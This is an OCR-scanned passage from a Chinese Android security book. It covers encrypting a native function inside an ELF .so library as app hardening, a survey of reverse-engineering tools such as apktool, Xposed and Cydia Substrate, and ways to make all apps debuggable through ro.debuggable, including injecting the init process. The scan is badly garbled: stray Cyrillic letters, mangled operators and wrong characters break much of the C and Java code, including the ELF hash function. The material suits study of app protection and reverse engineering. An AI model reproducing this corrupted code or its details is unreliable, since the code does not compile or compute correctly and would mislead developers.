给 出 了 具有 相同 哈 希 值 的 下 一 个 符号 表 项 。 可 以 沿 着 chain 链 一 直 搜 索 ， 直 到 所 选中 的 符号 表 项 包含 了 所 需要 的 符号 ,或 者 
chain 项 中 包含 值 STN_UNDEF。 


上 面 的 描述 感 物 有 点 复杂 ， 其 实说 的 简单 点 束 是 : 用 目标 国 数 名 在 用 hash 闵 数 得 到 一 个 hash 值 ， 然 后 再 做 一 些 计算 残 可 以 
得 到 这 个 函数 在 .dynsym 段 中 这 个 函数 对 应 的 条 目 了 。 关 于 这 个 hash 函 数 是 公用 的 ， 在 Android 中 的 bonicVlinker.c 源 码 中 也 是 
可 以 找到 的 : 


unsigned long elf hash (const unsigned char *name) { 
unsigned long h = 0, g; while (*name) 
{ 
һ= (1<<4) +*паме++; if (g = h & Ox£0000000) 
Hh^zg»»24: h&e-g:; 
} 


return h; 


) 


那么 只 要 得 到 .hash 段 即 可 ， 但 是 怎么 获取 到 这 个 section 中 呢 ? so 中 并 没有 对 这 个 section 进 行 数据 结构 的 描述 ， 有 人 可 能 
想到 了 在 上 图 中 看 到 ,hash 段 的 type 是 HASH， 那 么 再 通过 这 个 type 来 获取 ? 但 是 之 前 党 了 ， 这 个 type 不 是 唯一 的 ， 通 过 它 来 获 
取 section 是 不 靠 谱 的 ? 那么 该 怎么 办 呢 ? 这 时 候 就 要 看 一 下 程序 头 信息 了 ， 如 下 所 示 : 


Section to Segment mapping : 


01 .dunsym .dynstr .hash .rel.dyn .rel.plt .plt .text .rodata .ARM.extab .ARM.exidx 
inj “мау .init array .dynamic .got .data 


.dunamic 


05 .АВМ.ех1ах 
06 .fini array .init array .dunamic .got 


程序 头 信息 是 最 后 so 家 加 载 到 内 存 中 的 映像 摘 述 ， 这 里 看 到 有 一 个 .dynamic 段 。 再 看 看 so 文件 的 妆 载 视图 和 链接 视图 ， 如 
图 14-9 所 示 。 


在 之 前 也 说 过 ，so 被 加 载 到 内 存 之 后 ， 就 没有 section 了 ， 对 应 的 是 segment， 也 就 是 程序 头 中 描述 的 结构 ， 而 且 一 个 
segment 可 以 包含 多 个 section， 相 同 的 section 可 以 被 包含 到 不 同 的 Segment 中 。.dynamic 段 一 般 用 于 动态 链接 ， 所 
以 .dynsym 和 .dynstr，.hash 肯 定 包 含 在 这 里 。 可 以 解析 了 程序 头 信 息 之 后 ， 通 过 type 获 取 到 .dynamic 程 序 头 信息 ， 然 后 获取 到 
segment 的 偏 移 地 址 和 和 大小， 再 进行 解析 成 elf32_dyn 结 构 。 下 面 代码 束 是 程序 头 的 type 类 型 和 和 dyn 结构 描述 ， 可 以 在 elf.h 中 找 


Fl): 


public static class elf32_dyn{ 

public byte[] d tag = new byte[4]; 
public byte[] d val = new byte[4]; 
public byte[] d ptr = new byte[4]; 


aOverride 

public String toString()( 

return "d tag:"-4Utils.bytes2HexString(d tag)-«";d un d val:"-« 
Utils.bytes2HexString(d уа1) +";а un d ptr:"«Utils.bytes2HexString (d ptr); 
} 

} 


链接 视图 а 
ELF 头 部 
旦 序 头 部 表 


区 3E B3 


图 14-9 so 文件 的 装载 视图 和 链接 视图 
这 里 的 三 个 字段 合 义 如 下 : 
а tag: 标示 ， 标 示 这 个 dyn 是 什么 类 型 ， 是 .dynsym 还 是 .dynstt 等 。 
: d val: section 的 大 小 。 
а ptr: section 的 偏 移 地 址 。 


细心 的 读者 可 能 会 发 现 一 个 问题 ， 就 是 在 这 里 寻找 .dynamic 也 是 通过 类 型 的 ， 然 后 再 找到 对 应 的 section。 这 种 方式 和 之 前 
说 的 通过 type 来 寻找 section 有 两 个 不 同 之 处 : 


- 在 程序 头 信 息 中 ，type 标 示 .dynamic 段 是 唯一 的 ， 所 以 可 以 通过 type 来 进行 寻找 。 
- 看 到 上 面 的 链接 视图 和 装载 视图 发 现 ， 这 种 通过 程序 头 中 的 信息 来 查找 .dysym 等 section 靠 谱 点 ， 因 为 当 so 被 加 载 到 内 存 


中 ， 就 不 存在 了 section 了， 只 有 segment 了 。 


1422 ”实现 方案 


本 节 用 一 个 案例 来 展示 so 加 固 方法 ， 即 编写 native 程 序 直 接 返 回 字符 捉 给 Java 层 进行 展示 。 需 要 做 的 是 对 
Java com example shelldemo2 MainActivity getString 遂 数 进 行 加密 。 加 密 和 解密 都 是 基于 装载 视图 实现 。 注 意 ， 被 加 密 消 
数 如 果 用 static 声 明 ， 那 么 六 数 是 不 会 出 现在 .dynsym 中 ， 是 无 法 在 委 载 视图 中 通过 函数 名 找到 进行 解密 的 。 当 然 ， 也 可 以 采用 
取 巧 方式 ， 类 似 上 节 ， 把 地 址 和 长 度 信 息 写 入 so 头 中 实现 。Java com example shelldemo2 MainActivity getString 需 要 被 调 
用 ， 那 么 一 定 是 能 在 .dynsym 找 到 的 。 


1. 加 密 流 程 


1) 读 取 文件 头 ， 获 取 e_ phoff. e phentsize 和 e _phnum 信 息 。 


2) 通过 Elf32_Phdr 中 的 P_type 字 段 ， 找 到 DYNAMIC。 从 下 图 可 以 看 出 ， 其 实 DYNAMIC 融 是 .dynamic section, M 
p_offset 和 p_filesz 字 段 得 到 文件 中 的 起 始 位 置 和 长 度 。 


3) 遍历 .dynamic， 找 到 .dynsym、.dynstr、.hash section 文 件 中 的 偏 移 和 .dynstr 的 大 小 。 在 我 的 测试 环境 下 ，fedora 14 
和 windows7 Cygwin x64 中 elf.h 定 义 .hash 的 d_tag 标 示 是 : DT GNU HASH; 而 安 卓 源码 中 的 是 : DT_HASH。 


Д) 根据 立 数 名 称 ， 计 算 hash 值 。 


5) 根据 hash 值 ， 找 到 下 标 hash%nbuckets 的 bucket; 根据 bucket 中 的 值 ， ————— 
从 符号 的 st_name 索 引 找到 在 .dynstr 中 对 应 的 字符 串 与 函数 名 进行 比较 。 等 ， 则 根据 chain[hash%nbuckets] 找 下 一 个 
EIf32 Sym 符号， 直到 找到 或 者 chain 终 止 为 止 。 这 里 拆 述 得 有 些 复杂 ， 和 直接 上 代码 表示 : 


for(i = bucket[funHash $ nbucket]; i != 0; i = сһаіп[1]) { 
if(strcmp(dynstr + (funSym + i)-»st name, funcName) == 0){ 
Cilag e g; 
break; 
} 
} 


6) 找到 函数 对 应 的 Elf32_sym 街 号 后 ， 即 可 根据 st_value 和 st_size 字 段 找到 函数 的 位 置 和 大 小 。 


7) 后 面 的 步骤 焉 和 上 证 相同 了 ， 这 里 丈 不 帝 述 


解密 流程 为 加 密 逆 过 程 ， 大 体 相 同 ， 只 有 一 些 细微 的 区 别 ， 具 体 如 下 : 
: 找到 so 文件 在 内 存 中 的 起 始 地 址 。 
- 通过 so 文件 头 找 到 Phdr; 从 Phdr 找 到 PT_DYNAMIC 后 ， 需 取 p_vaddr 和 p_filesz 字 段 ， 并 非 p_offset， 这 里 需要 注意 。 


` 对 内 存 区 域 数 据 的 解 窒 ， 也 需要 注意 读 写 权 限 问题 。 


14.2.3 ”代码 实现 


1.native 程 序 


代码 如 下 : 


tdefine DEBUG 


typedef struct  funcInfo(í 
Е1#32 Addr st value; 
Е1#32 Word st size; 
)funcInfo; 


void init getString() | attribute  ((constructor)); 


static void print debug(const char *msg){ 
#ifdef DEBUG 


. android log print(ANDROID LOG INFO, "JNITag", "%s", msg); 
#епаі Ё 
} 


static unsigned elfhash(const char * name) 


{ 
const unsigned char *name = (const unsigned char *) name; 
unsigned h = 0, g; 
while(*name) { 
h = (h << 4) + *папе++; 
g = h & Ox£0000000; 
h ^= g; 
п = g S> 23 
) 
return h; 
) 


static unsigned int getLibAddr()fí 


unsigned int ret - 0; 

char name[] = "libdemo.so"; 
char buf[4096], *temp; 

int pid; 

FILE *fp; 


pid - getpid(); 
sprintf(buf, "/proc/$d/maps", pid); 
fp = fopen(buf, "r"); 
if(fp -- NULL) 
{ 
puts("open failed"); 
goto _error; 
) 
while(fgets(buf, sizeof(buf), Ёр)){ 
if(strstr(buf, пате) ) { 
temp = strtok(buf, "-"); 
ret = strtoul(temp, NULL, 16); 


break; 
} 
} 
_error: 
fclose(fp); 


return ret; 
RIZSA T2 BA sectionp hR, НЕА 0587-6), ERRE nA М. 
2. 加 密 程序 


代码 如 下 : 


private static void encodeFunc(byte[] fileByteArys)( 


/ / 寻找 Dynamic 段 的 偏 移 值 和 大 小 


int dy offset = 0,Яу size = 0; 
for(elf32 phdr phdr : type 32.phdrList)( 


if(Utils.byte21nt(phdr.p type) == ElfType32.PT DYNAMIC) í 


dy offset = Utils.byte2Int (phdr.p offset); 
dy size = Utils.byte2Int (phdr.p filesz); 


} 
System.out.println("dy_size:"+dy_size); 
int dynSize = 8; 

int size = dy size / dynSize; 
System.out.println("size:"-«size); 
byte[] dest = new byte[dynSize]; 

for (int 1=0;1і<ѕ1ле;і++) { 


System.arraycopy(fileByteArys, i*dynSize + dy offset, dest, 0, dynSize); 


type 32.dynList.add(parseDynamic (dest)); 


//type 32.printDynList(); 


byte[] symbolStr = null; 
int strSize-0,strOffset-0; 
int symbolOffset = 0; 

int dynHashOffset - 0; 

int funcIndex - 0; 

int symbolSize - 16; 


for(elf32 ауп dyn : type 32.dynList)(í 


if(Utils.byte21nt(dyn.d tag) == ElfType32.DT HASH)( 


dynHashOffset - Utils.byte2Int (dyn.d ptr); 


}else if(Utils.byte21nt(dyn.d tag) == ElfType32.DT STRTAB)(Í 


System.out.printin("strtab:"-«dyn); 
strOffset = Utils.byte21Int(dyn.d ptr); 


}else if(Utils.byte21nt(dyn.d tag) == ElfType32.DT SYMTAB)( 


System.out.println("systab:"-«dyn); 
symbolOffset - Utils.byte2Int(dyn.d ptr); 


)else if(Utils.byte21nt(dyn.d tag) == ElfType32.DT STRSZ)( 


System.out.println("strsz:"-«dyn); 
strSize = Utils.byte2Int (dyn.d. val); 


symbolStr - Utils.copyBytes(fileByteArys, strOffset, 


解密 程序 需要 说 明 一 下 。 


1) 定位 到 .dynamic 的 segment， 解 析 成 elf32 dyn 结 构 信息 : 


strSize); 


// 寻找 Dynamic 段 的 偏 移 值 和 大 小 
int dy offset = 0,dy_ size = 0; 
for(elf32 phdr phdr : type 32.phdrList)í 
if(Utils.byte21nt(phdr.p type) == ElfType32.PT DYNAMIC) { 
dy offset = Utils.byte21nt(phdr.p offset); 


dy size = Utils.byte2Int(phdr.p filesz); 


} 

System.out.println("dy_size:"+dy_size); 

int dynSize = 8; 

int size = dy size / dynSize; 

System.out.println("size:"-«size); 

byte[] dest = new byte[dynSize]; 

for(int 1=0;1<517е;і++) { 
System.arraycopy(fileByteArys, i*dynSize + dy offset, dest, 0, dynSize); 
type 32.dynList.add(parseDynamic(dest)); 


这 里 有 一 个 解析 elf32_dyn 结 构 : 


private static elf32 dyn parseDynamic(byte[] src)t 
elf32 dyn dyn - new elf32. dyn(); 
dyn.d tag = Utils.copyBytes(src, 0, 4); 
dyn.d ptr = Utils.copyBytes(src, 4, 4); 
dyn.d val = Utils.copyBytes(src, 4, 4); 
return dyn; 


需要 注意 的 是 ，elf32_dyn 中 用 到 了 联合 体 union 结 构 ，Java 中 是 不 人 存在 这 个 类 型 的 ， 所 以 需要 了 解 这 个 联合 体 的 含义 ， 虽 


然 是 三 个 字段 ， 但 是 大 小 是 8 个 字 节 ， 而 不 是 12 字 节 。dyn.d val 和 dyn.d val 是 在 一 个 联合 体 中 的 。 


2) 计算 目标 消 数 的 hash 值 ， 得 到 消 数 的 偏 移 值 和 大 小 : 


for(elf32_dyn dyn : type 32.dynList)(í 
if(Utils.byte21Int(dyn.d tag) == ElfType32.DT НАЅН) { 
/ / 这 里 的 逻辑 有 点 绕 
int nbucket = Utils.byte21nt(Utils.copyBytes(fileByteArys, dynHashOffset 


， 4)); 

int nchian = Utils.byte21nt(Utils.copvBytes(fileByteArys, dynHashOffset- 
4, 4)); 

int hash - (int)elfhash(funcName.getBytes()); 

hash - (hash $ nbucket); 


// 这 里 的 8 是 读 取 npbucket 和 nchian 的 两 个 值 
funcIndex = Utils.byte21nt(Utils.copyBytes(fileByteArys, dynHashOffset+ 
hash*4 + 8, 4)); 
System.out.println("nbucket:"+nbucket+",hash:"+hash+ 
" funcIndex:"«funclIndex-«",chian:"-«nchian); 
System.out.println("sym:"+Utils.bytes2HexString(Utils.int2Byte(symbolOffset))); 
System.out.println("hash:"+Utils.bytes2HexString(Utils.int2Byte 
(dynHashOffset))); 


byte[] des = new byte[symbolSize]; 

System.arraycopy(fileByteArys, symbolOffset-cfunclindex*symbolSi 
ze, des, 0, symbolSize); 

Elf32, Sym sym = parseSymbolTable(des); 

System.out.println("sym:"-«sym); 

boolean isFindFunc = Utils.isEqualByteAry(symbolStr, Utils.byte2Int(sym. 
st name), funcName); 

if(isFindFunc)!(í 


System.out.println("find func...."); 
return; 


while(true){ 

funcIndex = Utils.byte2Int (Utils.copyBytes (fileByteArys, dynHashOffset 
+4* (2+nbucket+funcIndex), 4)); 

System.out.println("funcIndex:"+funcIndex); 

System.arraycopy (fileByteArys, symbolOffset+funcIndex*symbolSize, 
des, 0, symbolSize); 

sym = parseSymbolTable(des); 

isFindFunc = Utils.isEqualByteAry(symbolStr, Utils.byte21nt(sym.st 
name), funcName); 

if(isFindFunc)f(í 
System.out.printlin("find func..."); 
int funcSize - Utils.byte2Int(sym.st size); 
int funcOffset - Utils.byte21nt(sym.st value); 
System.out.println("size:"-«funcSize-«",funcOffset:"-«funcOffset); 
/ / 进行 目标 函数 代码 部 分 进行 加 密 
// 这 里 需要 注意 的 是 从 funcOffset-1 的 位 置 开 始 
byte[] funcAry = Utils.copyBytes(fileByteArys, funcOffset-1, func 


Size); 
for(int i2z0;i«funcAry.length-1;i-s-«)( 
funcAry[i] = (byte)(funcAry[i] ^ OxFF); 
} 
Utils.replaceByteAry(fileByteArys, funcOffset-1, funcAry); 
break; 
} 
} 
break; 
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在 .dynsym 中 的 位 置 。 


上 面 对 so 中 的 函数 加 密 成 功 了 ， 那 么 下 面 来 验证 加 密 ， 直 接 使 用 IDA 进 行 查 看 ， 如 图 14-10 所 示 。 
可 以 看 到 ， 加 密 的 函数 内 容 已 经 面目 全 非 了 ， 看 不 到 信息 了 。 比 较 加 密 前 的 文件 ， 如 图 14-11 所 示 。 


提示 : 案例 下 载 地 址 为 http://download.csdn.net/detail/jiangwei0910410003/9289009 
3. 测 试 Android 项 目 

用 加 密 之 后 的 so 文件 来 测试 一 下 : 

package com.example.shelldemo; 


import android.app.Activity; 
import android.os.Bundle; 
import android.view.Menu;j 
import android.view.MenuIltem; 


import android.widget.TextView; 
public class MainActivity extends Activity ( 


private TextView tv; 
private native String getString(); 


statici 
System. loadLibrary ("demo"); 

} 

@Override 

protected void onCreate (Bundle savedlInstanceState) 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 


tv = (TextView) findViewById(R.id.tv); 
tv.setText (getString()); 


| sub_FDC 
| sub FEC 
| sub 1008 
init getString 
| . udivsi3 
f|. aeabi uidivmod 
|. aeabi ldivO 
| sub 147C 
| sub 1494 
f| sub 1668 
| sub 17E8 
| Unwind VRS Get 
| sub 1884 
7| Unwind VRS Set 
| sub 18F0 
| sub 191C 
|. aeabi unwind cpp pr2 
|. aeabi unwind cpp pr1 
| aeabi unwind cpp prO 
| Unwind VRS Pop 
| Unwind GetCFA 
f|. gnu Unwind RaiseException 
апи Unwind ForcedUnwind 
Fi . gnu Unwind Resume 
f|. gnu Unwind Resume, or Rethrow 
| Unwind Complete 


-text:00001388 
-text:0000138C ; 
-text:0000138C 
-text:0000138C 
-text-DBDB138U Java com shell | 

-text: 0000138Сс LDR H2, =BxE1ñB1BBNH 

-text:0000138E STR R7, [SP ,#0x3F4] 

Ba .1 n m rr rr m 
-text:00001390 DCD BEDC5SBGFD, BEXBBS6FF6h5, BxzB867ñ72U, BxB93F392F7, BxFFE8809 
-text:000013A4 CUDES2 


Tnuwd--d4d3 "hu la 


图 14-10 IDA 查 看 so 文件 


:| Library function P Data Regular function Unexplored 
Functions window 


Function name 


f|. сха atexit 

f| cxa finalize 

. android log. print 
getpid 

sprintf 

fopen 

puts 

strstr 

strtok 

strtoul 

fgets 

fclose 

. stack chk fail 
strcmp 

mprotect 

raise 

. апи Unwind Find exidx 
abort 

. cxa begin cleanup 
. cxa type match 
sub FDC 

sub FEC 

sub 1008 

init getString 
Java com example shelldemo2 MainActivity getStrina 
_ udivsi3 

. aeabi uidivmod 

. aeabi ldivO 


7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
7 
Fd 
7 
7 
Fa 
7 
7 
f|: 
Fd | 
7 


-text -BBBB138U 


-text -00BB138C EXPORT Java com example shelldemo2 Маіпӣсёіџііџ getstring 
-text -00BB138C Java com example shelldemo2 Hainñctiuitu getstring 

-Lext: #000138С PUSH 1R3,LR$ 

-Lext: BHBHT138E LDR R2, [RH] 

-text:00001390 LDR R1, =(aHatiuehethodRe - Bx139ñ) 

.-Ltext:BBBBd1392 HOUS H3, HBx29Ü 

-Lext -BBDBB1396 ñDD R1, PC „ "Native method return*" 
-Lext:BBBBd1398 LDR H3, [R2,R3] 

-text -0BB0139ñ BL R3 

-text -0BBD1349[L РОР 1R3,PE$ 


-text: 0688139G ; End of Function Java com example shelldemo?2 Hainüctiuity getstring 
„ехе: #000139С 
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运行 结果 如 图 14-12 所 示 。 


Native method return! 
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本 章 主要 介绍 了 通过 加 客 so 中 的 section 和 函数 来 实现 加 国 功能 ， 有 了 这 个 so 加 固 方 案 之 后 ， 可 以 让 App 开 发 更 加 安全 ， 破 解 
难度 加 大 。 但 是 也 不 能 说 是 绝对 安全 了 ， 比 如 现在 破解 者 在 init_getStting 函 数 下 断 点 ， 然 后 动态 调试 一 下 ， 就 可 以 很 轻易 地 破解 
了 ， 而 且 通 过 dump 出 内 存 中 运行 的 dex 也 是 可 以 做 到 的 。 所 以 ， 没 有 绝对 的 安全 ， 只 有 相对 的 攻防 。 


第 15 章 ”Android 首 向 分 析 基 础 


Android 逆 向 技术 不 是 陌生 的 话题 ， 网 上 已 经 有 很 多 资料 ， 本 和 草 主要 介绍 一 下 关于 逆向 分 析 apk 的 时 候 需 要 做 些 什么 。 在 送 向 


之 前 必须 有 好 工具 ， 其 次 是 还 需要 掌握 逆向 的 基本 知识 : smali 语 法 和 arm 指 令 ， 能 够 大 致 读 懂 程序 。 


这 几 个 工具 在 后 面 的 章节 中 都 会 用 到 . 


[xf 
ш 
>> 
Lc 
= 
一 
H 
1Ш 
=H 
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1. 反 编译 利器 apktool 


这 个 工具 用 Java 语 言 写 的 ， 而 且 也 是 开源 的 ， 同 时 它 是 遂 向 的 金 钥匙 ， 所 以 非常 重要 ， 而 且 现 在 很 多 apk 为 了 防止 被 这 个 工 


具 反 编 译 ， 融 针对 这 个 工具 的 漏洞 做 了 一 层 防 护 策 略 ， 如 果 要 成 功 反 编译 各 个 apk 的 话 ， 那 么 融 必 须 看 懂 它 的 源码 ， 然 后 针对 具 
体 反 编 译 异常 具体 分 析 ， 修 复 异 常 即 可 。 


2. 反 编译 姐妹 化 dex2jar+jd-gui 


这 两 个 工具 其 实 是 辅助 使 用 的 ， 一 般 是 直接 解压 apk 得 到 classes.dex 文 件 ， 使 用 dex2jar 转 化 成 jar 文 件 ， 使 用 jd-gui 来 直接 
查看 Java 源 码 。 


3. 反 编译 友好 工具 JEB 和 Jadx 


这 两 个 工具 其 实 是 整合 了 上 面 两 个 工具 的 功能 ， 让 上 反 编 译 实 现 了 可 视 化 操作 ， 而 且 高 效 快 捷 ， 适 合 在 快速 分 析 apk 内 部 信息 
的 场景 ， 也 是 不 可 或 缺 的 工具 。 


4.Hook 神 器 Xposed 框 架 


这 个 工具 主要 用 于 编写 游戏 外 挂 ， 获 取 应 用 关键 数据 此 工具 也 可 以 算得 上 神器 ， 有 了 它 ， 逆 向 App 残 是 手 到 擒 来 的 事 ， 用 已 
可 以 把 每 个 App 的 关键 逻辑 分 析 得 非常 清楚 。 


5.Native Hook 人 神器 Cydia Substrate 


这 个 工具 和 和 上面 的 Xposed 框 架 非 党 类似， 但 是 这 个 工具 除了 可 以 Hook Java 层 功能 ， 还 可 以 很 方便 地 Hook Native 层 功 
能 。 对 于 一 些 游戏 和 应 用 有 so 文件 ， 可 以 利用 这 个 框架 进行 hook so 中 的 指定 为 数 功能 。 


6. 脱 过 神器 ZjDroid 工 具 


tH 
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能 够 分 析 so 文 件 ， 同 时 可 以 动态 调试 so， 而 且 可 以 打开 apk 文 件 ，dex 文 件 也 是 不 在 话 下 的 。 
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要 学 习 逆向 ， 除 了 有 利 的 工具 ， 还 需要 了 解 一 些 基本 知识 ， 比 如 smali 语 法 、arm 指 令 、Android 中 的 NDK 开 发 等 ， 因 为 这 
些 都 是 在 逆向 过 程 中 经 常会 用 到 的 知识 。 


smali 语 法 是 逆 同 的 基础 核心 知识， 有 的 人 帝 得 这 个 是 人 否 是 一 | 门 新 的 语言 ”其 实 不 然 ， 它 的 语法 非 钊 简单 ， 熟 悉 起 来 非 囊 廊 
便 。 比 如 后 面 章节 会 利用 smali 语 法 手动 插入 代码 ， 而 并 不 是 需要 手动 编写 smali 代 码 ， 可 以 先 用 Java 编 写 好 功能 ， 再 反 编 译 成 
smali 代 码 ， 再 手动 插入 即 可 。 但 是 简单 的 smali 语 法 还 是 需要 看 懂 ， 比 如 赋值 、 方 法 调用 等 操作 ， 具 体 smali 语 法 知识 ， 在 后 面 


草书 会 详细 介绍 。 


arm 指 令 就 不 多 说 了 ， 在 大 学 期 间 就 有 这 门 课 ， 不 过 很 多 人 可 能 在 项 目 开发 中 并 没有 用 到 ， 但 是 arm 指 令 知识 对 于 逆向 来 说 


也 是 至 天 重要 ， 也 是 最 为 复杂 的 ， 现 在 很 多 应 用 为 了 更 加 安全 融 把 代码 都 放 到 了 so 中 ， 这 样 在 逆向 so 文件 的 时 候 融 必须 要 了 解 
arm 指 令 ， 才 能 大 致 看 懂 多 辑 代码 ， 才 能 继续 后 面 工作 。arm 指 令 也 并 非 那么 复杂 ， 多 看 多 读 束 会 慢 慢 熟练 了 。 相 天命 令 在 后 面 


章节 会 详细 介绍 。 


153 ”打开 系统 调试 总 开关 


本 节 将 介绍 如 何在 不 需要 反 编 译 的 情况 下 添加 android: debuggable 属 性 ， 就 可 以 进行 调试 。 现 在 已 经 有 很 多 工具 可 以 做 
这 件 事 了 ， 先 来 说 说 具体 的 原理 吧 。 


其 实 Android 中 有 一 些 常 用 的 配置 信息 都 是 存放 在 一 个 文件 中 ， 如 下 所 示 ， 比 如 设备 的 系统 、 版 本 号 、CPU 型 号 等 信息 ， 这 
个 文件 位 置 在 : /system/build.prop. 


C:NUsersNjlangweil-g>adb shell 

shell@pisces:/ $ su 

rootGa8pisces:/ # cat /system/build.prop |агер ro 
# begin build properties 

ro.build.id-KTU84P 

ro.build.display.id-KTU84P 


ro.build.version.incrementalzV7.1.3.0.KXCCNCK 
rPo.bsnl1ld.verésioón.sdk-l19 
ro.build.version.codename-REL 
ro.build.version.release-4.4.4 
ro.build.version.security patch-2015-12-01 
ro.build.version.base os- 
ro.build.date-Fri Dec 18 13:36:41 CST 2015 
ro.build.date.utcz1450417001 
ro.build.type-user 

ro.build.user-builder 
ro.build.host-zc-miui-ota-bd32 
ro.build.tags-release-keys 
ro.product.modelzMI 3 
ro.product.brand-Xiaomi 
ro.product.name-pisces 
ro.product.device-pisces 

ro.product.board- 
ro.product.cpu.abi-armeabi-v7a 
ro.product.cpu.abi2-armeabi 


查看 文件 的 内 容 ， 可 以 看 到 很 多 设备 的 信息 ， 而 且 这 些 ro 开 头 的 文件 表示 这 些 属性 值 是 只 读 的 ， 不 能 进行 修改 的 。 


同时 Android 中 提供 了 两 个 命令 来 操作 这 些 信息 : getprop 和 setprop 命 令 ， 如 下 所 示 : 


root@pisces:/ # getprop ro.build.version.sdk 
19 
root(üpisces:/ # 


查看 系统 的 sdk 版 本 号 如 下 所 示 : 


root@pisces:/ # setprop ro.build.version.sdk 22 
rootüpisces:/ # getprop ro.build.version.sdk 

19 

rootüpisces:/ # 


设置 系统 的 sdk 版 本 号 为 22， 可 是 这 里 并 没有 修改 成 功 ， 原 因 是 因为 ro 开头 的 属性 是 不 允许 后 期 修改 的 。 如 果 修 改 ， 需 要 重 
新 编译 系统 镜像 文件 boot.img， 但 是 这 里 并 不 是 本 节 介 绍 的 重点 。 


既然 Android 中 的 一 些 系统 属性 值 存放 在 一 个 文件 中 ， 而 且 这 些 值 是 只 读 的 ， 当 然 不 仪 可 以 通过 getprop 命 令 读 取 ， 有 一 个 
APl 也 是 可 以 直接 读 取 的 ， 就 是 : 


System.getProperty("ro.build.version.sdk"); 


其 实 这 个 方法 是 native 层 实现 的 ， 有 具体 就 不 分 析 了 。 那 么 这 个 文件 是 存储 这 些 属性 值 的 ， 是 谁 来 进行 解析 加 载 到 内 存 中 ， 能 
够 给 每 个 App 都 能 访问 到 呢 ? 


这 个 工作 就 是 init.rc 进 程 操 作 的 ， 系 统 启动 时 第 一 步 就 是 解析 init.rc 文 件 ， 这 个 文件 是 在 系统 的 根 目 录 下 ， 这 里 会 做 很 多 初 
始 化 操作 ， 同 时 会 做 属性 文件 的 解析 工作 ， 所 以 Android 属 性 系统 通过 系统 服务 提供 系统 配置 和 状态 的 管理 。 为 了 让 运行 中 的 所 
有 进程 共享 系统 运行 时 所 需要 的 各 种 设置 值 ， 系 统 会 开辟 一 个 属性 存储 区 域 ， 并 提供 访问 该 内 存 区 域 的 APl。 所 有 进程 都 可 以 访 
问 属性 值 ， 但 是 只 有 init 进 程 可 以 修改 属性 值 ， 其 他 进程 若 想 修改 属性 值 ， 需 要 向 init 进 程 发 出 请 求 ， 最 终 由 init 进 程 负责 修改 属 
性 值 。 


上 面 说 到 的 是 system/build.prop 文 件 。 里 面 主 要 是 系统 的 配置 信息 ， 其 实 还 有 一 个 重要 文件 在 根 目录 下 面 : 
default.prop， 如 下 所 示 : 


root@pisces:/ # cat /default.prop 
于 

# ADDITIONAL DEFAULT PROPERTIES 

Ñ 

ro.secure=1 
ro.allow.mock.location=0 
ro.adb.secure=1 
persist.sys.usb.config=mtp 
persist.sys.timezone=Asia/Shanghai 
root@pisces:/ #_ 


这 里 有 一 个 重要 属性 ro.debuggable， 关 系 到 系统 中 每 个 应 用 是 否 能 够 被 调试 的 关键 。 在 Android 系 统 中 一 个 应 用 能 否 被 调 
试 是 这 么 判断 的 : 当 Dalvik 虚 拟 机 从 Android 应 用 框架 中 启动 时 ， 系 统 属 性 ro.debuggable 为 1， 如 果 该 值 被 置 1， 系 统 中 所 有 的 


程序 都 是 可 以 调试 的 。 如 果 系 统 中 的 ro.debuggable 为 0， 则 会 判断 程序 的 AndroidManifest.xml 中 application 标 签 中 的 
android: debuggable 元 素 是 否 为 true， 如 果 为 true 则 开启 调试 支持 。 


这 相当 于 Android 系 统 中 有 一 个 开 天 ， 即 根 目 录 中 default.prop 文 件 中 的 ro.debuggable 属 性 值 ， 可 用 于 调试 所 有 设备 中 的 
应 用 。 如 果 把 这 个 属性 值 设置 成 1， 设 备 中 所 有 应 用 都 可 以 被 调试 ， 即 使 在 AndroidManifest.xml 中 没有 android: 
debuggable=true， 还 是 可 以 调试 的 。 而 这 些 系 统 属性 的 文件 system/build.prop 和 default.prop， 都 是 init 进 程 来 进行 解析 
的 ， 系 统 启 动 的 时 候 就 会 去 解析 init.rc 文 件 ， 这 个 文件 中 有 配置 关于 系统 属性 的 解析 工作 信息 。 然 后 会 把 这 些 系统 属性 信息 解析 
到 内 存 中 ， 提 供给 所 有 App 进 行 访 问 ， 这 块 信息 也 是 内 存 共享 的 。 但 是 这 些 ro 开头 的 属性 信息 只 能 init 进 程 进 行 修改 。 下 面 来 分 
析 一 下 修改 这 个 属性 值 的 三 种 方式 。 


第 一 种 方式 : 直接 修改 default.prop 文 件 中 的 值 ， 然 后 重 局 设备 。 那 么 现在 如 果 按 照 上 面 的 目的 : 融 是 不 需要 反 编 译 apk， 
添加 android: debuggable 属 性 的 话 ， 直 接 修 改 default.prop 文 件 ， 把 ro.debuggable 属 性 改 成 1 即 可 ， 但 是 通过 上 面 的 分 析 ， 
修改 完成 之 后 肯定 需要 重启 设备 的 ， 因 为 需要 让 init 进 程 重新 解析 属性 文件 ， 把 属性 信息 加 载 内 存 中 方 可 起 作用 的 。 但 是 并 没有 
那么 顺利 ， 在 实践 的 过 程 中 ， 修 改 了 这 个 属性 ， 绪 果 会 友 现 设备 死机 了 ， 其 实 想 想 也 是 正音 的 ， 如 果 属 性 能 够 通过 这 些 文 件 来 修 
改 的 话 ， 那 项 感 竞 系 统 会 出 现 各 种 问题 了 ， 系 统 是 不 会 允许 修改 这 些 文件 的 。 


第 二 种 方式 : 改写 系统 文件 ， 重 新 编译 系统 镜像 文件 ， 然 后 刷 入 到 设备 中 。 前 面 已 经 提 到 过 ， 这 些 属性 文件 是 在 系统 镜像 文 
件 boot.img 系 统 启 动 的 时 候 ， 释 放 到 具体 目录 中 的 ， 也 殊 是 说 如 果 能 够 直接 修改 boot.img 中 的 这 个 属性 即 可 ， 那 么 这 个 操作 是 
可 以 进行 的 。 理 论 上 是 可 以 的 , 但 是 我 没 成 功 操作 过 。 而 且 这 种 方式 如 果 成 功 了 ， 那 么 这 个 设备 束 是 永远 可 以 进行 各 种 应 用 的 调 
m. 


第 三 种 方式 : 注入 init 进 程 ， 修 改 内 存 中 的 属性 值 。 上 面 分 析 了 ，init 进 程 会 解析 这 个 属性 文件 ， 然 后 把 这 些 属性 信息 解析 到 
内 存 中 ， 给 所 有 App 进 行 访问 使 用 ， 所 以 在 init 进 程 的 内 仔 块 中 是 仔 在 这 些 属性 值 的， 那么 这 时 候 融 好 办 了 ， 有 一 个 技术 可 以 做 
